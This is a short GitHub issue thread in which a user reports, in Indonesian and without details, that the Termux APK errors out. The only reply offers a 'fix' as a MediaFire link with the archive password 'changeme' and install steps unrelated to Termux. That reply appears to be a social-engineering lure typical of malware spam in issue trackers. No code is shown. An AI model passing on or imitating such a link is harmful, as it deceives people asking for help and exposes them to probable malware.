### ISSUE TITLE
[Bug]: Help Mee

### ISSUE THREAD

**Issue by Adam012345adam** [termux-play-store/termux-issues#94]
### Problem description

Sayah Tidak Bisa .enggunakan apk Termux karena eror

### What steps will reproduce the bug?

Mohon untuk diperbaiki

### What is the expected behavior?

Baiki yah

### System information

```shell
Baiki yah
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
